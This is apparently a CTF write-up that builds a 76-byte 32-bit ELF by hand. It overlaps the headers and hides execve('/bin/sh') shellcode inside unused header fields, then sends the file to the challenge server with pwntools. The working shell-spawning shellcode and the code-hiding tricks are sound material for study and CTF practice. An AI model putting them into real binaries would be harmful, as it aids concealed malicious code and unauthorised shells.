Writing micro-shellcode in ELF format by hand

At AmateursCTF 2023, one of the pwn tasks was “ELFcrafting-v2”:

The smallest possible 64 bit ELF is 80 bytes. Can you golf it down to 79 bytes?

Attached is the binary that runs on the remote server. Opening it in Ghidra, we see what is required of us:

main function code

Thus, the only way to solve the problem and get the flag is to write an executable ELF file (because the signature at the beginning of the file is checked). Just in case, I checked the Linux kernel code for other ways to launch a file that starts with such a signature, but unfortunately a shebang line must begin with #!, and the other file formats are handled by separate modules and are not suitable either.

Learning the ELF format

Armed with the standard (link), let’s try to build at least some executable ELF file.

To begin with, we see that the file must begin with an ELF header, the structure of which is described as follows:

#define EI_NIDENT 16

typedef struct {
    unsigned char e_ident[EI_NIDENT];
    Elf32_Half    e_type;
    Elf32_Half    e_machine;
    Elf32_Word    e_version;
    Elf32_Addr    e_entry;
    Elf32_Off     e_phoff;
    Elf32_Off     e_shoff;
    Elf32_Word    e_flags;
    Elf32_Half    e_ehsize;
    Elf32_Half    e_phentsize;
    Elf32_Half    e_phnum;
    Elf32_Half    e_shentsize;
    Elf32_Half    e_shnum;
    Elf32_Half    e_shstrndx;
} Elf32_Ehdr;

The fields use the format's own data types. For the 32-bit ELF format (the 64-bit format has different definitions), they are defined just above in the document:

Name           Size  Alignment  Explanation
Elf32_Addr     4     4          Unsigned program address
Elf32_Half     2     2          Unsigned medium integer
Elf32_Off      4     4          Unsigned file offset
Elf32_Sword    4     4          Signed large integer
Elf32_Word     4     4          Unsigned large integer
unsigned char  1     1          Unsigned small integer

The header fields themselves have the following meaning:

  • e_ident – the ELF file identifier (described in detail below)

  • e_type – the type of the ELF file; for our purposes, the value 2, “Executable file”, is suitable

  • e_machine – the processor architecture required by the ELF file. The list in the document is incomplete (for example, the GCC compiler on my system emits type 0x3e, “Advanced Micro Devices X86-64”); we choose 3, “Intel 80386”, for the reason given below

  • e_version – according to the document, it should be equal to 1

  • e_entry – an important field for us: the address of the program's entry point in memory (not an offset from the beginning of the file)

  • e_phoff – another important field: the offset from the beginning of the file to the program headers, which are used to run the ELF file

  • e_shoff – the offset to the section headers, which are used to link the file; its value plays no role for our purposes, and that will matter later

  • e_flags – processor-specific flags; as it turned out, this field is not important either

  • e_ehsize – the size of the ELF header; despite its apparent significance, the Linux kernel seems to ignore this field when starting the file

  • e_phentsize – the size of each program header; in our case it is 32 bytes, the size of the program header structure in the specification

  • e_phnum – the number of program headers, 1

  • e_shentsize – the size of each section header, 0

  • e_shnum – the number of section headers, must be 0

  • e_shstrndx – the index in the section header array of the section holding the string name table, must also be 0
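
As a cross-check of the layout above, here is a minimal sketch that expresses Elf32_Ehdr as a format string for Python's standard struct module. The names EHDR_FORMAT, EHDR_FIELDS and unpack_ehdr are made up for this illustration, and little-endian byte order is assumed here (the identification section discussed next is what settles it).

```python
import struct

# Elf32_Ehdr as a struct format string (illustrative names, not from the spec):
# "<" selects little-endian with no implicit padding, "16s" is e_ident,
# "H" is a 2-byte Elf32_Half and "I" is a 4-byte Elf32_Word/Addr/Off.
EHDR_FORMAT = "<16sHHIIIIIHHHHHH"
EHDR_FIELDS = (
    "e_ident", "e_type", "e_machine", "e_version", "e_entry", "e_phoff",
    "e_shoff", "e_flags", "e_ehsize", "e_phentsize", "e_phnum",
    "e_shentsize", "e_shnum", "e_shstrndx",
)


def unpack_ehdr(data: bytes) -> dict:
    """Decode the leading bytes of a 32-bit little-endian ELF file."""
    size = struct.calcsize(EHDR_FORMAT)
    values = struct.unpack(EHDR_FORMAT, data[:size])
    return dict(zip(EHDR_FIELDS, values))


# Total size of the header described by the field list
print(struct.calcsize(EHDR_FORMAT))
```

The computed size matches the 52 used for e_ehsize and e_phoff in the first version of the header.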

At this point in the reading, it is not yet clear what the endianness of the numbers should be; the documentation answers this question further down, in the section on ELF identification. The ELF file identifier is 16 bytes long (as mentioned above) and has the following structure:

  • Signature: \x7fELF, or 7f 45 4c 46 in hexadecimal

  • File class: 1 for ELF32, 2 for ELF64

  • Encoding: 1 for little-endian, 2 for big-endian

  • Version: same as the header version field, 1

  • Padding: 9 zero bytes to pad up to 16 bytes; the standard ignores their value

Much further down, in the Intel-specific section, the document states that little-endian encoding must be used and that the e_machine field should be 3.
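
The identifier layout can be sketched as a small helper. The function name make_e_ident and its parameter names are hypothetical; the default values are the ones chosen in the text (ELF32, little-endian, version 1).

```python
def make_e_ident(elf_class: int = 1, encoding: int = 1, version: int = 1) -> bytes:
    """Build the 16-byte e_ident: signature, class, encoding, version, padding."""
    ident = b"\x7fELF" + bytes([elf_class, encoding, version])
    # Pad with zero bytes up to EI_NIDENT (16); 9 bytes of padding remain
    return ident.ljust(16, b"\x00")


e_ident = make_e_ident()
print(len(e_ident), e_ident.hex(" "))
```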

Now everything is ready to assemble the first header of the file:

elf_header = bytes([
    *b'\x7fELF', 1, 1, 1, *([0] * 9), # e_ident
    *2 .to_bytes(2, 'little'), # e_type
    *3 .to_bytes(2, 'little'), # e_machine
    *1 .to_bytes(4, 'little'), # e_version
    *0 .to_bytes(4, 'little'), # e_entry TODO
    *52 .to_bytes(4, 'little'), # e_phoff
    *0 .to_bytes(4, 'little'), # e_shoff
    *0 .to_bytes(4, 'little'), # e_flags
    *52 .to_bytes(2, 'little'), # e_ehsize
    *32 .to_bytes(2, 'little'), # e_phentsize
    *1 .to_bytes(2, 'little'), # e_phnum
    *0 .to_bytes(2, 'little'), # e_shentsize
    *0 .to_bytes(2, 'little'), # e_shnum
    *0 .to_bytes(2, 'little'), # e_shstrndx
])

The e_entry field is left unfilled here, because we do not yet know what to put in it. So it is time to move on to the second header, the program header. Its structure is described as follows:

typedef struct {
    Elf32_Word p_type;
    Elf32_Off  p_offset;
    Elf32_Addr p_vaddr;
    Elf32_Addr p_paddr;
    Elf32_Word p_filesz;
    Elf32_Word p_memsz;
    Elf32_Word p_flags;
    Elf32_Word p_align;
} Elf32_Phdr;

Description of fields:

  • p_type – the segment type; in our case it will be 1, “Loadable”

  • p_offset – the offset from the beginning of the file to the contents of the segment

  • p_vaddr – the virtual address of the segment

  • p_paddr – the physical address of the segment, for operating systems that do not use virtual addressing

  • p_filesz – the size of the segment in the file

  • p_memsz – the size of the segment in memory; it cannot be less than p_filesz, and if it is greater, the tail of the segment is filled with zeros

  • p_flags – the segment flags; in our case the value is 5, which sets bit 1 for execution and bit 4 for reading

  • p_align – the required segment alignment; in practice it turned out that it cannot be completely arbitrary, and on Linux the value 0x1000 worked, which corresponds to the alignment of virtual memory pages
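
The program header fields can be sketched with the struct module as well. The helper make_phdr and the constant names are assumptions for this illustration (the flag values 1, 2 and 4 for execute, write and read follow the specification); the check on p_memsz mirrors the rule stated in the list.

```python
import struct

PT_LOAD = 1                    # loadable segment
PF_X, PF_W, PF_R = 1, 2, 4     # execute, write, read permission bits
PHDR_FORMAT = "<8I"            # eight 4-byte little-endian fields


def make_phdr(offset: int, vaddr: int, filesz: int, memsz: int,
              flags: int = PF_R | PF_X, align: int = 0x1000) -> bytes:
    """Pack an Elf32_Phdr for one loadable segment (hypothetical helper)."""
    if memsz < filesz:
        raise ValueError("p_memsz cannot be less than p_filesz")
    # p_paddr is set to the same value as p_vaddr, as in the article
    return struct.pack(PHDR_FORMAT, PT_LOAD, offset, vaddr, vaddr,
                       filesz, memsz, flags, align)


phdr = make_phdr(offset=0, vaddr=0x1000, filesz=93, memsz=93)
print(len(phdr), PF_R | PF_X)
```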

Now we can write the program header:

program_header = bytes([
    *1 .to_bytes(4, 'little'), # p_type
    *0 .to_bytes(4, 'little'), # p_offset TODO
    *0 .to_bytes(4, 'little'), # p_vaddr TODO
    *0 .to_bytes(4, 'little'), # p_paddr TODO
    *0 .to_bytes(4, 'little'), # p_filesz TODO
    *0 .to_bytes(4, 'little'), # p_memsz TODO
    *5 .to_bytes(4, 'little'), # p_flags
    *0x1000 .to_bytes(4, 'little'), # p_align
])

In this header quite a lot of values are left for later, which means it is time to write the code of the program itself. For simplicity, let’s just write a successful exit:

mov eax, 1 ; sys_exit system call number
xor ebx, ebx ; exit status code to return
int 0x80 ; software interrupt that performs a Linux syscall

To assemble the file I use pwntools, so the resulting code looks like this:

from pwn import * 


MEMORY_START = 0x1000

code = asm(f'''
mov eax, 1
xor ebx, ebx
int 0x80
''', arch="x86", os="linux")

elf_header = bytes([
    *b'\x7fELF', 1, 1, 1, *([0] * 9), # e_ident
    *2 .to_bytes(2, 'little'), # e_type
    *3 .to_bytes(2, 'little'), # e_machine
    *1 .to_bytes(4, 'little'), # e_version
    *(MEMORY_START + 84).to_bytes(4, 'little'), # e_entry
    *52 .to_bytes(4, 'little'), # e_phoff
    *0 .to_bytes(4, 'little'), # e_shoff
    *0 .to_bytes(4, 'little'), # e_flags
    *52 .to_bytes(2, 'little'), # e_ehsize
    *32 .to_bytes(2, 'little'), # e_phentsize
    *1 .to_bytes(2, 'little'), # e_phnum
    *0 .to_bytes(2, 'little'), # e_shentsize
    *0 .to_bytes(2, 'little'), # e_shnum
    *0 .to_bytes(2, 'little'), # e_shstrndx
])

program_header = bytes([
    *1 .to_bytes(4, 'little'), # p_type
    *0 .to_bytes(4, 'little'), # p_offset
    *MEMORY_START.to_bytes(4, 'little'), # p_vaddr
    *MEMORY_START.to_bytes(4, 'little'), # p_paddr
    *(84 + len(code)).to_bytes(4, 'little'), # p_filesz
    *(84 + len(code)).to_bytes(4, 'little'), # p_memsz
    *5 .to_bytes(4, 'little'), # p_flags
    *0x1000 .to_bytes(4, 'little'), # p_align
])

print(len(elf_header), elf_header)
print(len(program_header), program_header)
print(len(code), code)

with open('./result', 'wb') as f:
    f.write(elf_header)
    f.write(program_header)
    f.write(code)

What stayed behind the scenes was the choice of values for p_vaddr and p_paddr. On my system 0x1000 works, but when all the work was done and it was time to send the solution to the server, the program refused to run. It turned out that Ubuntu Linux, for example, sets the vm.mmap_min_addr limit to 0x10000. In general, it is recommended to use the value 0x8048100, which is described in the document in the section “Operating System Specific (UNIX System V Release 4)”.
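
To avoid discovering this limit only on the remote server, the load address can be compared against the local setting beforehand. This is a rough sketch: the helper names are made up, the value is read from /proc/sys/vm/mmap_min_addr (the procfs view of the vm.mmap_min_addr sysctl on Linux), and 0x10000 is used as a fallback assumption when that file is not readable.

```python
from pathlib import Path


def read_mmap_min_addr(path: str = "/proc/sys/vm/mmap_min_addr",
                       default: int = 0x10000) -> int:
    """Return the lowest mappable address, or `default` if it cannot be read."""
    try:
        return int(Path(path).read_text().strip())
    except (OSError, ValueError):
        return default


def is_mappable(vaddr: int, min_addr: int) -> bool:
    """An unprivileged process cannot map pages below vm.mmap_min_addr."""
    return vaddr >= min_addr


limit = read_mmap_min_addr()
for candidate in (0x1000, 0x08048000):
    print(hex(candidate), is_mappable(candidate, limit))
```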

Also, the segment cannot be loaded from an arbitrary place in the file. For example, we cannot start at the bytes right after the headers, because that offset is not aligned to the 0x1000 given in p_align. Therefore, we load from the beginning of the file and point e_entry at the code, which starts 84 bytes in (52 bytes of ELF header plus 32 bytes of program header).
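
The alignment constraint can be stated as a one-line check. The specification's rule is that p_vaddr should equal p_offset modulo p_align (with 0 and 1 meaning no alignment is required); the function name below is hypothetical, and whether a particular loader accepts every case the rule permits is not verified here.

```python
def offset_matches_vaddr(p_offset: int, p_vaddr: int, p_align: int) -> bool:
    """Check the ELF rule: p_vaddr == p_offset (mod p_align)."""
    if p_align in (0, 1):
        return True  # no alignment required
    return p_offset % p_align == p_vaddr % p_align


# Loading from the start of the file at a page-aligned address satisfies the rule
print(offset_matches_vaddr(0, 0x1000, 0x1000))
# Loading the bytes after the headers (offset 84) at a page-aligned address does not
print(offset_matches_vaddr(84, 0x1000, 0x1000))
```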

Let’s check that everything works:

Running the first version of the file

Of course, this is not the required 79 bytes, but at least it works. And 93 bytes is not bad either, albeit for a program that does nothing.
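
The 93 bytes break down as follows. The instruction bytes below are written out by hand as the usual encodings of the three instructions; that an assembler emits exactly these bytes is an assumption of this sketch, not something taken from the pwntools output.

```python
EHDR_SIZE = 52   # Elf32_Ehdr
PHDR_SIZE = 32   # Elf32_Phdr

# Hand-written encodings (assumed to match the assembler's choice)
code = bytes.fromhex(
    "b801000000"  # mov eax, 1
    "31db"        # xor ebx, ebx
    "cd80"        # int 0x80
)

code_offset = EHDR_SIZE + PHDR_SIZE          # where the code starts in the file
total_size = code_offset + len(code)         # size of the whole file
print(code_offset, len(code), total_size)
```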

Compressing the file

In order to reduce the file size, let’s look at it in hexadecimal code:

File side view

Our ELF header is marked in red, the program header is in green, the rest is code.

Here, the coincidence of the last 8 bytes of the ELF header with the first 8 bytes of the program header is immediately striking. Overlapping them costs us almost nothing, because these bytes mostly hold values that we could not change anyway without breaking the file, so the program header can start 8 bytes earlier, at offset 44.
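
The overlap can be confirmed mechanically. The sketch below rebuilds both headers of the first version with the struct module and looks for the longest suffix of one that is a prefix of the other; the helper name overlap_length is made up for this example.

```python
import struct

MEMORY_START = 0x1000
CODE_LENGTH = 9  # length of the exit stub from the first version

ehdr = struct.pack(
    "<16sHHIIIIIHHHHHH",
    b"\x7fELF\x01\x01\x01".ljust(16, b"\x00"),  # e_ident
    2, 3, 1,                                    # e_type, e_machine, e_version
    MEMORY_START + 84, 52, 0, 0,                # e_entry, e_phoff, e_shoff, e_flags
    52, 32, 1, 0, 0, 0,                         # e_ehsize .. e_shstrndx
)
phdr = struct.pack(
    "<8I", 1, 0, MEMORY_START, MEMORY_START,
    84 + CODE_LENGTH, 84 + CODE_LENGTH, 5, 0x1000,
)


def overlap_length(first: bytes, second: bytes) -> int:
    """Length of the longest suffix of `first` that is also a prefix of `second`."""
    for n in range(min(len(first), len(second)), 0, -1):
        if first[-n:] == second[:n]:
            return n
    return 0


shared = overlap_length(ehdr, phdr)
merged_size = len(ehdr) + len(phdr) - shared   # size of the overlapped headers
new_phoff = len(ehdr) - shared                 # where the program header now starts
print(shared, merged_size, new_phoff)
```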

Now let’s think about what we actually want the program to do. We clearly have very little space, so we will not read the flag file (which is located in the same directory and is named flag.txt) and print it to the screen. Let’s try the classic trick instead and run /bin/sh.

This takes just one system call, but the string with the path still has to be stored somewhere. This is where the 9 padding bytes at the end of the identifier help us! We also need to pass the argv and envp arrays for the arguments and environment variables, but we will simply ignore that and pass null pointers. Fortunately, this is allowed, and what is more, when the program starts the system carefully zeroes all the registers for us, so we do not have to do anything at all. With these optimizations, the code now looks like this:

from pwn import *


MEMORY_START = 0x08048000
HEADER_LENGTH = 76

code = asm(f'''
mov eax, 11
mov ebx, {MEMORY_START + 8}
int 0x80
''', arch="x86", os="linux")

header = bytes([
    *b'\x7fELF', 1, 1, 1, 0, *b'/bin/sh', 0, # e_ident
    2, 0, 3, 0, 1, 0, 0, 0, # e_type, e_machine, e_version
    *(MEMORY_START + HEADER_LENGTH).to_bytes(4, 'little'), # e_entry
    44, 0, 0, 0, # e_phoff
    *([0] * 10), # e_shoff, e_flags, e_ehsize
    32, 0, 1, 0, 0, 0, 0, 0, 0, 0, # e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
                                   # p_type, p_offset
    *MEMORY_START.to_bytes(4, 'little'), # p_vaddr
    *MEMORY_START.to_bytes(4, 'little'), # p_paddr
    *HEADER_LENGTH.to_bytes(4, 'little'), # p_filesz
    *HEADER_LENGTH.to_bytes(4, 'little'), # p_memsz
    5, 0, 0, 0, 0, 0x10, 0, 0, # p_flags, p_align
])

assert len(header) == HEADER_LENGTH

print(len(header), header)
print(len(code), code)

with open('./result', 'wb') as f:
    f.write(header)
    f.write(code)

Check if it still works:

Checking the work of the second option

At this stage, it is already becoming clear where the 76 bytes from the preface came from: all that remains is to tuck the assembly code away somewhere.

Packing the code in the header

First, let’s see how we can generally reduce our current code:

mov eax, 11
mov ebx, 0x08048008
int 0x80

Clearly, the last instruction cannot be shortened. Loading ebx depends on the value, but it certainly cannot be reduced to 2 bytes. The initialization of eax, however, is easily rewritten as mov al, 11:

0:  b0 0b                   mov    al, 0xb
2:  bb 08 80 04 08          mov    ebx, 0x8048008
7:  cd 80                   int    0x80

That is only 9 bytes! Recall from the beginning of the story that the fields e_shoff, e_flags and e_ehsize are not used, and together they occupy exactly 10 bytes in the header. All that remains is to put everything together:



MEMORY_START = 0x08048000
HEADER_LENGTH = 76

header = bytes([
    *b'\x7fELF', 1, 1, 1, 0, *b'/bin/sh', 0, # e_ident
    2, 0, 3, 0, 1, 0, 0, 0, # e_type, e_machine, e_version
    *(MEMORY_START + 32).to_bytes(4, 'little'), # e_entry
    44, 0, 0, 0, # e_phoff
    0xb0, 0x0b, # mov al, 11
    0xbb, *(MEMORY_START + 8).to_bytes(4, 'little'), # mov ebx, MEMORY_START + 8
    0xcd, 0x80, # int 0x80
    0, # padding: unused second byte of e_ehsize
    32, 0, 1, 0, 0, 0, 0, 0, 0, 0, # e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
                                   # p_type, p_offset
    *MEMORY_START.to_bytes(4, 'little'), # p_vaddr
    *MEMORY_START.to_bytes(4, 'little'), # p_paddr
    *HEADER_LENGTH.to_bytes(4, 'little'), # p_filesz
    *HEADER_LENGTH.to_bytes(4, 'little'), # p_memsz
    5, 0, 0, 0, 0, 0x10, 0, 0, # p_flags, p_align
])

assert len(header) == HEADER_LENGTH

print(len(header), header)

with open('./result', 'wb') as f:
    f.write(header)
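
The offset 32 used for e_entry and the 10-byte window for the code both follow from the field sizes. A small sketch that derives them (the FIELDS table and helper name are illustrative; the shellcode bytes are copied from the disassembly above):

```python
import struct

# (field name, struct code) for the start of Elf32_Ehdr, in file order
FIELDS = [
    ("e_ident", "16s"), ("e_type", "H"), ("e_machine", "H"),
    ("e_version", "I"), ("e_entry", "I"), ("e_phoff", "I"),
    ("e_shoff", "I"), ("e_flags", "I"), ("e_ehsize", "H"),
    ("e_phentsize", "H"),
]


def field_offsets() -> dict:
    """Map each field name to its byte offset from the start of the file."""
    offsets, position = {}, 0
    for name, code in FIELDS:
        offsets[name] = position
        position += struct.calcsize("<" + code)
    return offsets


offsets = field_offsets()
shellcode = bytes.fromhex("b00b" "bb08800408" "cd80")  # from the listing above

# Unused window: e_shoff + e_flags + e_ehsize, ending where e_phentsize begins
window = offsets["e_phentsize"] - offsets["e_shoff"]
print(offsets["e_shoff"], window, len(shellcode))
```

The code is one byte shorter than the window, which is why a single zero byte follows it in the listing.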

You can see how we have moved from elf_header, program_header and code, first to header and code, and now to just header =)

First, let’s make sure the kernel can still run the file:

Verification of the third version

There are, of course, some unpleasant side effects. For example, gdb now refuses to run our file. This can be worked around by running it through gdbserver, but it is still annoying.
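
When the usual tools refuse such a file, a few lines of Python can at least confirm that the overlapped fields decode the way we intend. This is only a sanity-check sketch: build_header repeats the bytes of the final listing, and summarize is a hypothetical helper, not a replacement for a debugger.

```python
import struct

MEMORY_START = 0x08048000


def build_header() -> bytes:
    """Rebuild the 76-byte file from the final listing."""
    return bytes([
        *b"\x7fELF", 1, 1, 1, 0, *b"/bin/sh", 0,            # e_ident
        2, 0, 3, 0, 1, 0, 0, 0,                             # e_type, e_machine, e_version
        *(MEMORY_START + 32).to_bytes(4, "little"),         # e_entry
        44, 0, 0, 0,                                        # e_phoff
        0xb0, 0x0b,                                         # mov al, 11
        0xbb, *(MEMORY_START + 8).to_bytes(4, "little"),    # mov ebx, path address
        0xcd, 0x80,                                         # int 0x80
        0,                                                  # padding
        32, 0, 1, 0, 0, 0, 0, 0, 0, 0,                      # e_phentsize .. p_offset
        *MEMORY_START.to_bytes(4, "little"),                # p_vaddr
        *MEMORY_START.to_bytes(4, "little"),                # p_paddr
        *(76).to_bytes(4, "little"),                        # p_filesz
        *(76).to_bytes(4, "little"),                        # p_memsz
        5, 0, 0, 0, 0, 0x10, 0, 0,                          # p_flags, p_align
    ])


def summarize(data: bytes) -> dict:
    """Decode the fields the loader relies on, following e_phoff."""
    e_type, e_machine, _, e_entry, e_phoff = struct.unpack_from("<HHIII", data, 16)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    (p_type, p_offset, p_vaddr, _, p_filesz, _,
     p_flags, p_align) = struct.unpack_from("<8I", data, e_phoff)
    entry_offset = e_entry - p_vaddr + p_offset   # file offset of the first instruction
    return {
        "e_type": e_type, "e_machine": e_machine, "e_phoff": e_phoff,
        "e_phentsize": e_phentsize, "e_phnum": e_phnum,
        "p_type": p_type, "p_filesz": p_filesz,
        "p_flags": p_flags, "p_align": p_align,
        "entry_offset": entry_offset,
        "code": data[entry_offset:entry_offset + 9],
        "path": data[8:data.index(b"\x00", 8)],
    }


header = build_header()
for name, value in summarize(header).items():
    print(name, value)
```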

Getting the flag

To get the flag, let’s write one more script, so as not to bother with redirecting input first from the file and then from the terminal, or anything like that:

from pwn import *


# sh = process(['./chal'])
sh = remote(...)

with open('result', 'rb') as f:
    sh.send(f.read())

sh.interactive()

And finally, we get the flag:

Getting the flag

Afterword

Of course, many points were skipped along the way, both in solving the task and in the details of the ELF format. This material should be taken primarily as a how-to for solving similar CTF tasks, that is, as a write-up rather than a full-fledged textbook on the ELF format.

Thanks for reading! I hope you found this interesting. Do not be afraid to dig into specifications, and above all do not treat the workings of individual parts of a computer or operating system as something magical. Everything has sources.
